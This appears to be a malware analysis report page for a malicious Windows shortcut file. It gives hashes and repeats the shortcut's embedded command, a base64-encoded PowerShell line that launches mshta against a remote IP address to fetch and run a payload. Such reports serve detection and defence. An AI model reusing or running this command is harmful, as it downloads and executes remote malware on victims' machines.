Malicious
Malicious

29b86baa0216ace3c3a172cc92663ebe.testlnk1.lnk

LNK File
|
MD5: 29b86baa0216ace3c3a172cc92663ebe
|
Size: 1.62 KB
|
application/x-ms-shortcut

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
29b86baa0216ace3c3a172cc92663ebe
Sha1
ce31dde19709be89f4a2c05ad18f94b21eb86e96
Sha256
55f6a5cf46fef4da9e6027846d7c34e20416c1fd83178d15b87c3ae59bf85325
Sha384
f89b8d7e42edb8d71ec0adb8a3976cc887625607dba186f8ada77455016e5d1ae3dcd4a00dc6c15c6f89f6f04d30378c
Sha512
00645731e2f6859d4e1a6ae591592d118ee0004b7be31228c76668d477fcd102adca69c0ca17a78f6576e2f26a35e7b263026d802e6e6c30d2f7731ffdd4e9b5
SSDeep
24:8J/BHYVKVWU+/CWaO0CaYSSPVdzjgP3pcBGlsMbLYmvqaSUHWBjs:8x5asTpYSrP3pLaMbLYmvqqWB
TLSH
043128280AE60299F2338778EBF5B3734421FBE2DD695BFC218067455626100B467E3A
File Structure
29b86baa0216ace3c3a172cc92663ebe.testlnk1.lnk
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAG0AXgBeAHMAXgBeAGgAdABhACAAaABeAF4AXgBeAHQAXgBeAHQAcAA6AC8ALwBeADkAXgBeAF4ANABeAF4AXgBeAC4AXgAxAF4AXgBeADUAOQAuADkAOQAuAF4AXgAxAF4AXgBeAF4ANgA5AC8AMQBeADIAMwBeAC4AbQBwAF4AXgBeADQAXgBeAF4AXgBeAF4AXgAnAC4AcgBlAHAAbABhAGMAZQAoACcAXgAnACwAJwAnACkAOwBpAGUAeAAgACgAZwBjAGIAKQA=
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAG0AXgBeAHMAXgBeAGgAdABhACAAaABeAF4AXgBeAHQAXgBeAHQAcAA6AC8ALwBeADkAXgBeAF4ANABeAF4AXgBeAC4AXgAxAF4AXgBeADUAOQAuADkAOQAuAF4AXgAxAF4AXgBeAF4ANgA5AC8AMQBeADIAMwBeAC4AbQBwAF4AXgBeADQAXgBeAF4AXgBeAF4AXgAnAC4AcgBlAHAAbABhAGMAZQAoACcAXgAnACwAJwAnACkAOwBpAGUAeAAgACgAZwBjAGIAKQA="
29b86baa0216ace3c3a172cc92663ebe.testlnk1.lnk (1.62 KB)
File Structure
29b86baa0216ace3c3a172cc92663ebe.testlnk1.lnk
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAG0AXgBeAHMAXgBeAGgAdABhACAAaABeAF4AXgBeAHQAXgBeAHQAcAA6AC8ALwBeADkAXgBeAF4ANABeAF4AXgBeAC4AXgAxAF4AXgBeADUAOQAuADkAOQAuAF4AXgAxAF4AXgBeAF4ANgA5AC8AMQBeADIAMwBeAC4AbQBwAF4AXgBeADQAXgBeAF4AXgBeAF4AXgAnAC4AcgBlAHAAbABhAGMAZQAoACcAXgAnACwAJwAnACkAOwBpAGUAeAAgACgAZwBjAGIAKQA=

Malicious

29b86baa0216ace3c3a172cc92663ebe.testlnk1.lnk
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAG0AXgBeAHMAXgBeAGgAdABhACAAaABeAF4AXgBeAHQAXgBeAHQAcAA6AC8ALwBeADkAXgBeAF4ANABeAF4AXgBeAC4AXgAxAF4AXgBeADUAOQAuADkAOQAuAF4AXgAxAF4AXgBeAF4ANgA5AC8AMQBeADIAMwBeAC4AbQBwAF4AXgBeADQAXgBeAF4AXgBeAF4AXgAnAC4AcgBlAHAAbABhAGMAZQAoACcAXgAnACwAJwAnACkAOwBpAGUAeAAgACgAZwBjAGIAKQA="

Malicious

29b86baa0216ace3c3a172cc92663ebe.testlnk1.lnk > LNK CommandLine > [PowerShell Command]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙